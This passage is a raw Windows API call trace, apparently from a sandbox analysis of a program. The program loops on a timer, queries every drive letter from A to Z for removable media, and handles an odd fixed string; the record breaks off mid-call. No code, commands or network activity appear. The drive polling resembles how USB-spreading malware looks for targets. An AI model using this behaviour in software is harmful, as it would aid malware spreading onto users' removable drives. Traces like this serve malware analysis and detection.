[0218.365] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.366] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.366] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.366] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.366] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.367] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.367] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.367] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.367] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.368] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.368] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.368] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.368] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.368] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febf0 | out: hHeap=0x12c0000) returned 1 [0218.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0218.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8c0 [0218.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.369] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.369] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0218.369] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.369] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.369] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.369] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.369] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.370] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.370] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0218.370] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.370] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.370] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x13260c0 [0218.370] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.370] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x13260c0 | out: hHeap=0x12c0000) returned 1 [0218.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.370] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0218.383] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e3c0 [0218.383] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.383] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.383] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.383] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.383] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.383] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.383] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e3c0 | out: hHeap=0x12c0000) returned 1 [0218.383] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.383] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.383] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.383] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0218.383] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.383] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0218.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.384] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0218.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0218.384] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0218.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.384] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0218.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd298 [0218.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.384] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0218.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0218.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.384] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.384] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.385] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0218.385] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.385] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0218.385] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.385] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.385] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.385] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.385] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.385] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.385] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.386] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.386] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.386] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.386] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.386] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.386] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.386] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.448] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.448] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.449] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.449] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.449] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.449] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.449] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.449] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.450] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.450] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.450] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.450] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.451] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.451] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0218.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0218.451] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.451] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0218.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.452] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.452] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.452] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 1 [0218.452] TranslateMessage (lpMsg=0x7dfb8c) returned 0 [0218.452] DispatchMessageW (lpMsg=0x7dfb8c) returned 0x0 [0218.452] KillTimer (hWnd=0x802d6, uIDEvent=0x1) returned 1 [0218.452] SetTimer (hWnd=0x802d6, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0218.453] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0218.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0218.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325fa0 [0218.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0218.453] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.453] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.453] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0218.453] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325fa0 | out: hHeap=0x12c0000) returned 1 [0218.453] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0218.453] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0218.453] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132df40 [0218.453] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132df40 | out: hHeap=0x12c0000) returned 1 [0218.454] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0218.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.454] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.454] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.454] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.454] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0218.454] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.454] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.454] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.455] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd2f8 [0218.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0218.455] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0218.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8c0 [0218.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.455] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8c0 | out: hHeap=0x12c0000) returned 1 [0218.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0218.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0218.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef8b0 [0218.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef860 [0218.455] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.455] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0218.455] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0218.456] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0218.456] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0218.456] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0218.456] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0218.456] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0218.456] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0218.456] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0218.456] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0218.457] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0218.457] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0218.457] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0218.457] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0218.457] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0218.457] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0218.458] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0218.458] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0218.458] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0218.458] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0218.458] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0218.458] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0218.459] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0218.459] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0218.459] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0218.459] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0218.459] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0218.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0218.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0218.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.459] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0218.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0218.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0218.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0218.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0218.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0218.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0218.460] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef810 [0218.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0218.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0218.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f80 [0218.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0218.460] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0218.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0218.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0218.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f80 | out: hHeap=0x12c0000) returned 1 [0218.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0218.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0218.460] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e600 [0218.460] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.460] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e600 | out: hHeap=0x12c0000) returned 1 [0218.461] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0218.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0218.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0218.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0218.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0218.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0218.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0218.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0218.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0218.461] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef880 [0218.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0218.461] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0218.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0218.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0218.461] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0218.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0218.461] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0218.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0218.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318ba0 [0218.461] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0218.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0218.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0218.461] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) 